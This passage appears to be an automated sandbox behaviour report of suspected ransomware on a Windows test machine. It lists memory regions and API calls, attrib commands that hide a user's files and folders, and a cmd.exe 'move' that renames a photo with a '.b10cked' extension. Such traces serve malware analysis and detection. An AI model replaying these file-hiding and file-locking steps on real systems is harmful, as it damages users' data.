0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16920 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 16921 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") 
Region: id = 16922 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16923 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16924 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 16925 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16926 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16927 start_va = 0x1d0000 end_va = 0x297fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 16928 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16929 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 248 os_tid = 0x9c4 Process: id = "192" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16a80" os_pid = "0x878" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "187" os_parent_pid = "0xfdc" cmd_line = "attrib +h 
\"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 16982 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 16983 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 16984 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 16985 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 16986 start_va = 0x170000 end_va = 0x176fff entry_point = 0x170000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 16987 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 16988 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 16989 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 16990 start_va 
= 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 16991 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16992 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16993 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16994 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16995 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 16996 start_va = 0x490000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 16997 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 16998 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16999 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 17000 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") 
Region: id = 17001 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 17002 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 17003 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 17004 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 17005 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 17006 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 17007 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 17008 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 17009 start_va = 0x180000 end_va = 0x247fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 17010 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 
region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 17011 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 249 os_tid = 0x808 Process: id = "193" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16a80" os_pid = "0x974" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "187" os_parent_pid = "0xfdc" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 17012 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 17013 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 17014 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 17015 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 17016 start_va = 0x500000 end_va = 0x506fff entry_point = 0x500000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: 
"c:\\windows\\system32\\attrib.exe") Region: id = 17017 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17018 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 17019 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 17020 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 17021 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 17022 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 17023 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 17024 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 17025 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 17026 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 17027 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: 
"c:\\windows\\system32\\ulib.dll") Region: id = 17028 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 17029 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 17030 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 17031 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 17032 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 17033 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 17034 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 17035 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 17036 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" 
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 17037 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 17038 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 17039 start_va = 0x110000 end_va = 0x1d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 17040 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 17041 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 250 os_tid = 0x838 Process: id = "194" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ee0" os_pid = "0x828" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\QGVEFX~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\qgVefxhoS8T3s19q574.jpg.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" 
[0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 17160 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 17161 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 17162 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 17163 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 17164 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 17165 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17166 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 17167 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 17168 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 17169 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 17220 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 17221 start_va = 0x20000 end_va 
= 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 17222 start_va = 0x160000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 17223 start_va = 0x260000 end_va = 0x2c6fff entry_point = 0x260000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 17224 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 17225 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 17226 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 17227 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 17228 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 17229 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 17230 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: 
"c:\\windows\\system32\\user32.dll") Region: id = 17231 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 17232 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 17233 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 17234 start_va = 0x3a0000 end_va = 0x467fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 17235 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 17236 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 17237 start_va = 0x150000 end_va = 0x156fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 17238 start_va = 0x2d0000 end_va = 0x2d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 17239 start_va = 0x2e0000 end_va = 0x2e0fff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 17240 start_va = 0x2f0000 end_va = 0x2f0fff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 17241 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" 
filename = "" Region: id = 17242 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 17243 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Thread: id = 251 os_tid = 0x7ec [0144.807] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fb0c | out: lpSystemTimeAsFileTime=0x12fb0c*(dwLowDateTime=0x903dd100, dwHighDateTime=0x1d440a9)) [0144.807] GetCurrentProcessId () returned 0x828 [0144.807] GetCurrentThreadId () returned 0x7ec [0144.807] GetTickCount () returned 0x2d28a [0144.807] QueryPerformanceCounter (in: lpPerformanceCount=0x12fb04 | out: lpPerformanceCount=0x12fb04*=20159586049) returned 1 [0144.807] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0144.807] __set_app_type (_Type=0x1) [0144.807] __p__fmode () returned 0x76b331f4 [0144.807] __p__commode () returned 0x76b331fc [0144.808] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0144.808] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0144.808] GetCurrentThreadId () returned 0x7ec [0144.808] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7ec) returned 0x38 [0144.808] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0144.808] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0144.808] SetThreadUILanguage (LangId=0x0) returned 0x409 [0144.808] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0144.808] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12fa9c | out: phkResult=0x12fa9c*=0x0) returned 0x2 
[0144.808] VirtualQuery (in: lpAddress=0x12fad3, lpBuffer=0x12fa6c, dwLength=0x1c | out: lpBuffer=0x12fa6c*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.809] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12fa6c, dwLength=0x1c | out: lpBuffer=0x12fa6c*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0144.809] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12fa6c, dwLength=0x1c | out: lpBuffer=0x12fa6c*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0144.809] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12fa6c, dwLength=0x1c | out: lpBuffer=0x12fa6c*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.809] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12fa6c, dwLength=0x1c | out: lpBuffer=0x12fa6c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0144.809] GetConsoleOutputCP () returned 0x1b5 [0144.809] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0144.809] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0144.809] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.809] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0144.809] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.809] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0144.809] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.809] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0144.809] _get_osfhandle (_FileHandle=0) returned 0x3 [0144.810] GetConsoleMode (in: 
hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0144.810] _get_osfhandle (_FileHandle=0) returned 0x3 [0144.810] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0144.810] GetEnvironmentStringsW () returned 0x170208* [0144.810] FreeEnvironmentStringsW (penv=0x170208) returned 1 [0144.810] GetEnvironmentStringsW () returned 0x170208* [0144.810] FreeEnvironmentStringsW (penv=0x170208) returned 1 [0144.810] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12ea0c | out: phkResult=0x12ea0c*=0x40) returned 0x0 [0144.810] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x0, lpData=0x12ea18*=0x98, lpcbData=0x12ea10*=0x1000) returned 0x2 [0144.810] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x4, lpData=0x12ea18*=0x1, lpcbData=0x12ea10*=0x4) returned 0x0 [0144.810] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x0, lpData=0x12ea18*=0x1, lpcbData=0x12ea10*=0x1000) returned 0x2 [0144.810] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x4, lpData=0x12ea18*=0x0, lpcbData=0x12ea10*=0x4) returned 0x0 [0144.810] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x4, lpData=0x12ea18*=0x40, lpcbData=0x12ea10*=0x4) returned 0x0 [0144.810] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: 
